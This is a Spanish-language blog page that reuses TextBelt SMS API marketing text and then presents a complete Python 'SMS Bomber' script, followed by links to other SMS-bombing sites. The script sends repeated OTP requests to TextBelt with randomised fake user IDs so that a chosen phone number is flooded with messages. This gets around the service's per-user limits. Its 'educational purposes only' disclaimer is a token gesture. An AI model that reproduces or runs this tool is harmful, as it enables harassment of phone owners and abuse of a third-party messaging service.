TextBelt Open Source Sms Hacker
Envía y recibe SMS con una API simple e intuitiva
Textbelt es una API de SMS sin sentido creada para desarrolladores que solo desean enviar SMS. Hay una versión gratuita y una versión paga:
Para un servidor de SMS gratuito y autohospedado, dirígete al proyecto de código abierto.
Para obtener una solución confiable de configuración cero , lea a continuación y genere una clave API .
Miles de clientes prefieren Textbelt a otros proveedores de SMS por nuestra facilidad de configuración , paquetes de precios simples y predecibles y soporte personal .
Enviar un mensaje de texto con una solicitud HTTP
Pruébalo ahora. Sin bibliotecas de clientes, facturación recurrente o inicios de sesión de cuenta:
$ curl -X POST https://textbelt.com/text \
--data-urlencode phone='5555555555' \
--data-urlencode message='Hello world' \
-d key=textbelt
Use key=textbelt para enviarse 1 texto gratis por día. Necesitará su propia clave para enviar más mensajes después.
- Funciona para los sistemas operativo windows ,linux,termux
- python 2.7
Codigo
from random import randint
import platform
import os
import signal
import time
import sys
if platform.system().lower() == "windows":
os.system('color')
try:
input = raw_input
except NameError:
pass
def shutdown(signal, frame):
print ('\n\033[1;31mCtrl+C was pressed, shutting down!\033[0m')
sys.exit()
def main():
print('\033[1;77m _____________ __________\033[1;93m_______ ______ \033[0m')
print('\033[1;77m __ ___/__ |/ /_ ___/\033[1;93m__ __ )____________ ______ /______________ \033[0m')
print('\033[1;77m _____ \__ /|_/ /_____ \ \033[1;93m__ __ | __ \_ __ `__ \_ __ \ _ \_ ___/ \033[0m')
print('\033[1;77m ____/ /_ / / / ____/ /\033[1;93m _ /_/ // /_/ / / / / / / /_/ / __/ / \033[0m')
print('\033[1;77m /____/ /_/ /_/ /____/ \033[1;31m /_____/ \____//_/ /_/ /_//_.___/\___//_/ \033[0m\033[1;77mv1.0 \033[0m')
print('\n')
print('\033[1;77mhttps://github.com/thelinuxchoice/smsbomber')
print('\033[1;77mtwitter: @linux_choice')
print('\033[1;31m[!] Legal disclaimer: Educational purposes only. Use only against your own number. Developers are not responsible for any damage caused by this program\033[0m\n')
signal.signal(signal.SIGINT, shutdown)
user_agent = 'Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0'
sess = requests.Session()
counter=1
try:
total_sms=int(input('\033[1;77mTotal SMS: \033[0m'))
except: #if total_sms == None:
total_sms=3
message=input('\033[1;77mMessage: \033[0m')
if message == '':
message='script kiddie on board'
phone=input('\033[1;77mCountry Code + Phone: \033[0m')
if phone == '':
print('\033[1;31mPhone required.\033[0m')
sys.exit()
print('\033[1;93mStarting SMS Bomber, \033[0m\033[1;77mpress crtl + c to stop... \033[0m')
time.sleep(3)
while counter <= total_sms:
r1=randint(0,999)
r2=randint(100,9999)
post_req = sess.post('https://textbelt.com/otp/generate', headers={ 'user-agent': user_agent}, data={
'phone':'%s' % phone,
'userid':'myuser{}@site{}.com'.format(r1,r2),
'message':'%s' % message,
'key':'textbelt'
})
#print(post_req.text) #debug
if '"success":true' in post_req.text:
print('\033[1;93mMessage\033[0m\033[1;77m %d/%d\033[0m \033[1;31mSent!\033[0m' % (counter,total_sms))
counter+=1
elif '"error":"Invalid phone number or bad request.' in post_req.text:
print('\033[1;93mInvalid phone number or bad request. Exiting...\033[0m')
sys.exit()
else:
print('Message %d not sent, trying again...' % counter)
time.sleep(1)
if __name__ == '__main__':
main()
- rubí - djds23 / textbelt-gem
- ir - dietsche / textbelt
- python - ksdme / py-textbelt
- node.js - minond / textbelt , ajay-gandhi / textbelt , soondobu / mtextbelt
- php - ctrlaltdylan / courier , securingsincity / phpsms
- bash - cfalk / MessageMe
- página web html / js / mobile - mLuby / SMS , daluu / textbelt-clients
- Extensión del navegador: Chrome , Firefox , Safari , Opera
- Windows Phone - TextBelter
- Aplicación SendSMS para Mac
- Widget del panel OSX
- Dispositivo de Windows 7 / Vista
- https://www.bolivia-sms.com/
- https://www.bolivia-sms.com/s/viva-sms-gratis
- https://www.bolivia-sms.com/s/configurar-internet-viva
- https://www.viva.com.bo/personal/serviciosmoviles/mensajeria
☆・。。・゜゜・。。・゜★
- https://textbelt.com/#
- https://github.com/typpo/textbelt
- https://github.com/ksdme/py-textbelt
- https://github.com/mLuby/smsHR
- https://textbelt.com/blog/
- https://github.com/bhattsameer/Bombers
- https://github.com/typpo/textbelt
- https://smstextbomber.com/
- https://mytoolstown.com/smsbomber/
- https://smsbomber.online/
- https://panel.descomsms.com/es/login
PERMANECE LEGAL. GRACIAS!
Si tienes algún problema, deja un comentario y comparte tú opinión.
¿Ha quedado contestada su pregunta?
Comentarios
Publicar un comentario
Únete a la conversación y comparte tú Opinión